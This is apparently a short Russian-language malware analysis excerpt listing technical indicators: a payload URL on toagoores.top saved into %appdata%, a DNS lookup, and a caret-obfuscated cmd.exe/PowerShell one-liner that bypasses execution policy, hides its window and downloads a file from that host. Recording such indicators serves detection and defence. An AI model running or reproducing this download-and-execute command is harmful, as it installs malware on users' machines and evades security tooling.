Техническая информация
- http://toagoores.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "p^owE^R^sH^e^lL.exE -^exE^CU^Tion^P^Olicy bypasS^ ^-n^Opro^F^iLE ^-^W^iN^DoWsT^YL^e H^IddeN ^(^NEW-Obj^ect s^Y^sTEM^.^ne^t.weB^C^l^iEN^t).d^OWn^L^o^a^dfi^Le('http://toagoores.top/rea...
- DNS ASK to###ores.top
- '<SYSTEM32>\cmd.exe' /c "p^owE^R^sH^e^lL.exE -^exE^CU^Tion^P^Olicy bypasS^ ^-n^Opro^F^iLE ^-^W^iN^DoWsT^YL^e H^IddeN ^(^NEW-Obj^ect s^Y^sTEM^.^ne^t.weB^C^l^iEN^t).d^OWn^L^o^a^dfi^Le('http://toagoores.top/rea...' (со скрытым окном)